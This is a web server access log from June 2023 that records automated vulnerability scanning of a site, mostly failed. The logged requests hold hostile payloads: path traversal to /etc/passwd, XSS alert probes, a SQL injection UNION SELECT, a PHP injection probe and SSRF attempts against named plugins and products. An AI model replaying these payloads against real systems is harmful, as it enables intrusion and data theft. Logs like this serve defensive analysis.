107.189.31.184 - - [17/Jun/2023:21:14:02 +0530] "GET /wp-content/plugins/w3-total-cache/pub/minify.php?file=yygpKbDS1y9Ky9TLSy0uLi3Wyy9KB3NLKkqUM4CyxUDpxKzECr30_Pz0nNTEgsxiveT8XAA.css HTTP/1.1" 404 1090
107.189.31.184 - - [17/Jun/2023:21:14:42 +0530] "POST /install/install.php?step=4 HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:21:14:43 +0530] "POST /install/install.php?step=4 HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:21:14:44 +0530] "GET /install/includes/configure.php HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:21:14:48 +0530] "GET /install/includes/configure.php HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:21:15:04 +0530] "USER anonymous " 400 -
107.189.31.184 - - [17/Jun/2023:21:15:05 +0530] "USER anonymous " 400 -
41.186.73.134 - - [17/Jun/2023:21:16:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:21:17:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
45.128.232.141 - - [17/Jun/2023:21:17:19 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:21:17:32 +0530] "GET /index.php?option=com_rsfiles&path=../../../../../../../../../etc/passwd&task=files.display HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:21:17:33 +0530] "GET /index.php?option=com_rsfiles&path=../../../../../../../../../etc/passwd&task=files.display HTTP/1.1" 404 1012
209.141.41.129 - - [17/Jun/2023:21:17:40 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:21:18:29 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_ultimateportfolio HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:21:18:29 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_ultimateportfolio HTTP/1.1" 404 1012
87.120.88.58 - - [17/Jun/2023:21:18:40 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:21:18:49 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:21:18:50 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:21:19:30 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:21:19:32 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:21:20:18 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:21:08 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:21:21:10 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:21:21:10 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:21:21:12 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:21:21:12 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:21:21:14 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
41.186.73.134 - - [17/Jun/2023:21:21:21 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:22:10 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:21:22:11 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:21:22:12 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:21:22:14 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:21:22:14 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:21:22:15 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:21:22:58 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:21:22:59 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:21:24:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:25:06 +0530] "GET /index.php?controller=../../../../../../../../../etc/passwd%00&option=com_graphics HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:21:25:07 +0530] "GET /index.php?controller=../../../../../../../../../etc/passwd%00&option=com_graphics HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:21:25:31 +0530] "GET /web_shell_cmd.gch HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:21:25:31 +0530] "GET /web_shell_cmd.gch HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:21:25:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:27:03 +0530] "GET //interact.sh/%2f.. HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:21:27:03 +0530] "GET //interact.sh/%2f.. HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:21:27:14 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:21:27:14 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:21:27:19 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:21:27:19 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:21:27:24 +0530] "GET /ip?Z78909657371Q1 HTTP/1.1" 404 998
90.151.171.108 - - [17/Jun/2023:21:27:24 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:21:27:25 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:21:27:29 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:21:27:46 +0530] "GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:21:27:46 +0530] "GET /download/index.php?file=../../../../../../../../../etc/passwd HTTP/1.1" 404 1030
41.186.73.134 - - [17/Jun/2023:21:28:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:21:30:04 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:31:53 +0530] "POST /htdocs/login/login.lua HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:21:31:53 +0530] "POST /htdocs/login/login.lua HTTP/1.1" 404 1038
87.120.88.58 - - [17/Jun/2023:21:32:56 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:21:33:18 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:21:34:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:36:02 +0530] "GET /wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1114
107.189.31.184 - - [17/Jun/2023:21:36:02 +0530] "GET /wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1114
107.189.31.184 - - [17/Jun/2023:21:36:29 +0530] "GET /.magnolia/admincentral HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:21:36:30 +0530] "GET /.magnolia/admincentral HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:21:37:12 +0530] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:21:37:12 +0530] "GET /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:21:37:28 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:21:37:29 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
41.186.73.134 - - [17/Jun/2023:21:37:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:37:48 +0530] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 1066
107.189.31.184 - - [17/Jun/2023:21:37:49 +0530] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 1066
107.189.31.184 - - [17/Jun/2023:21:37:50 +0530] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1" 404 1066
107.189.31.184 - - [17/Jun/2023:21:37:51 +0530] "GET /webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd HTTP/1.1" 404 1066
41.186.73.134 - - [17/Jun/2023:21:38:40 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:39:03 +0530] "POST /hms/doctor/ HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:21:39:03 +0530] "POST /hms/doctor/ HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:21:40:14 +0530] "GET /ueditor/php/controller.php?action=catchimage&source[]=http://127.0.0.1:893644/?1.png HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:21:40:14 +0530] "GET /ueditor/php/controller.php?action=catchimage&source[]=http://127.0.0.1:606206/?1.png HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:21:40:16 +0530] "GET /ueditor/jsp/controller.jsp?action=catchimage&source[]=http://127.0.0.1:683330/?1.png HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:21:40:16 +0530] "GET /ueditor/jsp/controller.jsp?action=catchimage&source[]=http://127.0.0.1:606697/?1.png HTTP/1.1" 404 1046
83.97.73.89 - - [17/Jun/2023:21:41:51 +0530] "GET /securityRealm/user/admin/search/index?q=a HTTP/1.1" 404 1068
41.186.73.134 - - [17/Jun/2023:21:42:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:42:27 +0530] "GET /passwordreset?bundle=';alert(document.domain);var+ok=' HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:21:42:28 +0530] "GET /passwordreset?bundle=';alert(document.domain);var+ok=' HTTP/1.1" 404 1020
83.97.73.89 - - [17/Jun/2023:21:42:30 +0530] "GET /securityRealm/user/admin/search/index?q=a HTTP/1.1" 404 1068
41.186.73.134 - - [17/Jun/2023:21:43:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
45.227.254.8 - - [17/Jun/2023:21:44:04 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:21:44:45 +0530] "GET /lfm.php HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:21:44:45 +0530] "GET /lfm.php HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:21:45:47 +0530] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:21:45:47 +0530] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:21:45:49 +0530] "GET /OA_CGI/FNDWRR.exe HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:21:45:49 +0530] "GET /OA_CGI/FNDWRR.exe HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:21:45:51 +0530] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:21:45:51 +0530] "POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1" 404 1048
41.186.73.134 - - [17/Jun/2023:21:46:18 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:46:34 +0530] "POST /share/page/dologin HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:21:46:36 +0530] "POST /share/page/dologin HTTP/1.1" 404 1030
41.186.73.134 - - [17/Jun/2023:21:47:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:47:31 +0530] "GET /snippets.inc.php?search=True&searchColumn=snippetName&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchOption=contains HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:21:47:32 +0530] "GET /snippets.inc.php?search=True&searchColumn=snippetName&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL+--+&searchOption=contains HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:21:47:34 +0530] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 1122
107.189.31.184 - - [17/Jun/2023:21:47:35 +0530] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 404 1122
83.97.73.89 - - [17/Jun/2023:21:48:33 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:21:48:37 +0530] "POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:21:48:38 +0530] "POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1" 404 1032
83.97.73.89 - - [17/Jun/2023:21:49:22 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:21:49:27 +0530] "GET /../../../../../../../../etc/passwd HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:21:49:33 +0530] "GET /../../../../../../../../etc/passwd HTTP/1.1" 400 -
83.97.73.89 - - [17/Jun/2023:21:50:04 +0530] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:21:50:15 +0530] "GET /views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:21:50:15 +0530] "GET /views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php HTTP/1.1" 400 -
83.97.73.89 - - [17/Jun/2023:21:50:21 +0530] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 1052
41.186.73.134 - - [17/Jun/2023:21:50:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
181.114.139.97 - - [17/Jun/2023:21:51:09 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:21:51:35 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:21:54:10 +0530] "GET /php/connector.minimal.php?cmd=file&download=1&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:21:54:11 +0530] "GET /php/connector.minimal.php?cmd=file&download=1&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:21:54:22 +0530] "GET /assets/php/filebrowser/filebrowser.main.php?do=download&file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1080
107.189.31.184 - - [17/Jun/2023:21:54:24 +0530] "GET /assets/php/filebrowser/filebrowser.main.php?do=download&file=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1080
41.186.73.134 - - [17/Jun/2023:21:54:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:21:56:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:21:56:11 +0530] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:21:56:52 +0530] "POST /servlet/UploadServlet HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:21:56:52 +0530] "POST /servlet/UploadServlet HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:21:56:54 +0530] "GET /test.txt HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:21:56:56 +0530] "GET /s/2RHou4rnHRRg1ZcEhR0V9vAkzoT/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1" 404 1192
90.151.171.106 - - [17/Jun/2023:21:56:57 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:21:56:57 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:21:56:57 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:21:56:57 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:21:56:57 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:21:56:57 +0530] "GET /s/2RHou4rnHRRg1ZcEhR0V9vAkzoT/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 1184
107.189.31.184 - - [17/Jun/2023:21:56:58 +0530] "GET /test.txt HTTP/1.1" 404 1010
90.151.171.106 - - [17/Jun/2023:21:57:02 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:21:57:02 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:21:57:02 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:21:57:03 +0530] "GET /s/2RHou4rnHRRg1ZcEhR0V9vAkzoT/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1" 404 1192
107.189.31.184 - - [17/Jun/2023:21:57:06 +0530] "GET /s/2RHou4rnHRRg1ZcEhR0V9vAkzoT/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1" 404 1184
41.186.73.134 - - [17/Jun/2023:21:59:15 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:21:59:58 +0530] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
41.186.73.134 - - [17/Jun/2023:22:00:19 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:00:49 +0530] "GET /wp-content/plugins/cab-fare-calculator/tblight.php?action=1&ajax=1&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1094
107.189.31.184 - - [17/Jun/2023:22:00:49 +0530] "GET /wp-content/plugins/cab-fare-calculator/tblight.php?action=1&ajax=1&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1094
83.97.73.89 - - [17/Jun/2023:22:02:23 +0530] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
83.97.73.89 - - [17/Jun/2023:22:02:58 +0530] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1094
41.186.73.134 - - [17/Jun/2023:22:03:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:22:04:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:04:37 +0530] "GET /i553%3Cimg%20src=x%20data%27a%27onerror=alert%28domain%29%3E.childrenlist.html HTTP/1.1" 404 1150
107.189.31.184 - - [17/Jun/2023:22:04:38 +0530] "GET /sgyt%3Cimg%20src=x%20data%27a%27onerror=alert%28domain%29%3E.childrenlist.html HTTP/1.1" 404 1150
107.189.31.184 - - [17/Jun/2023:22:04:39 +0530] "GET /u0SO%3Cbr%3E%3Cbr%3Eplease%20authenticate%3Cbr%3E%3Cbr%3E.childrenlist.html HTTP/1.1" 404 1144
107.189.31.184 - - [17/Jun/2023:22:04:40 +0530] "GET /Bmyd%3Cbr%3E%3Cbr%3Eplease%20authenticate%3Cbr%3E%3Cbr%3E.childrenlist.html HTTP/1.1" 404 1144
107.189.31.184 - - [17/Jun/2023:22:04:54 +0530] "GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1164
107.189.31.184 - - [17/Jun/2023:22:04:55 +0530] "GET /wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1164
45.128.232.141 - - [17/Jun/2023:22:05:13 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:22:05:25 +0530] "GET /tests/generate.php HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:22:05:25 +0530] "GET /tests/generate.php HTTP/1.1" 404 1030
198.98.50.108 - - [17/Jun/2023:22:06:15 +0530] "CONNECT myipb1a.mrrage.xyz:80 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:22:06:57 +0530] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 404 1092
107.189.31.184 - - [17/Jun/2023:22:06:57 +0530] "GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1" 404 1092
107.189.31.184 - - [17/Jun/2023:22:07:05 +0530] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:22:07:05 +0530] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:22:07:53 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:08:05 +0530] "GET null null" 400 -
41.186.73.134 - - [17/Jun/2023:22:08:58 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:09:00 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:22:09:06 +0530] "GET /wp-admin/admin-ajax.php?action=8c1b70253866869e3e19202a4b00615c HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:22:09:07 +0530] "GET /wp-admin/admin-ajax.php?action=a84ac2df72ef9cf2a1f1442fa244c014 HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:22:09:08 +0530] "GET /wp-admin/admin-ajax.php?action=0371f949a0d24a6259cd8b183e77234a HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:22:09:09 +0530] "GET /wp-admin/admin-ajax.php?action=d1676d97484751d186de6cc293bd55ed HTTP/1.1" 404 1040
41.186.73.134 - - [17/Jun/2023:22:12:10 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:22:13:13 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:13:18 +0530] "GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1124
107.189.31.184 - - [17/Jun/2023:22:13:20 +0530] "GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1124
83.97.73.89 - - [17/Jun/2023:22:13:30 +0530] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:22:14:00 +0530] "GET /embed.js HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:22:14:02 +0530] "GET /embed.js HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:22:15:36 +0530] "GET /api/v2/cmdb/system/admin HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:22:15:37 +0530] "GET /api/v2/cmdb/system/admin HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:22:15:38 +0530] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 403 1004
107.189.31.184 - - [17/Jun/2023:22:15:39 +0530] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 403 1004
83.97.73.89 - - [17/Jun/2023:22:16:09 +0530] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:22:16:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:16:49 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_advertising HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:16:50 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_advertising HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:17:05 +0530] "GET /?pp=env HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:22:17:06 +0530] "GET /?pp=env HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:22:17:11 +0530] "GET /api/stats HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:17:12 +0530] "GET /api/stats HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:17:13 +0530] "GET /horizon/api/stats HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:17:14 +0530] "GET /horizon/api/stats HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:22:17:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:18:05 +0530] "POST /mifs/.;/services/LogService HTTP/1.1" 404 1048
83.97.73.89 - - [17/Jun/2023:22:18:16 +0530] "POST /mifs/.;/services/LogService HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:22:20:29 +0530] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 404 1082
107.189.31.184 - - [17/Jun/2023:22:20:30 +0530] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 404 1082
107.189.31.184 - - [17/Jun/2023:22:20:31 +0530] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:22:20:32 +0530] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 404 1076
41.186.73.134 - - [17/Jun/2023:22:20:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:22:21:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:22:42 +0530] "GET /storage/logs/laravel.log HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:22:22:43 +0530] "GET /storage/logs/laravel.log HTTP/1.1" 404 1042
83.97.73.89 - - [17/Jun/2023:22:24:15 +0530] "GET /console/ HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:22:24:22 +0530] "POST /classes/Login.php?f=login HTTP/1.1" 404 1028
192.241.194.9 - - [17/Jun/2023:22:24:23 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:22:24:23 +0530] "POST /classes/Login.php?f=login HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:22:24:24 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:22:24:26 +0530] "GET / HTTP/1.1" 200 11250
192.241.194.9 - - [17/Jun/2023:22:24:52 +0530] "GET / HTTP/1.1" 200 11250
192.241.236.39 - - [17/Jun/2023:22:24:57 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:22:25:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:22:25:01 +0530] "GET /console/ HTTP/1.1" 404 1010
192.241.236.39 - - [17/Jun/2023:22:25:08 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:22:26:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:22:27:30 +0530] "GET /squid.svg?background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&title=Not%20Found HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:22:27:31 +0530] "GET /squid.svg?background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&title=Not%20Found HTTP/1.1" 404 1012
83.97.73.89 - - [17/Jun/2023:22:28:38 +0530] "GET /_ignition/execute-solution HTTP/1.1" 404 1046
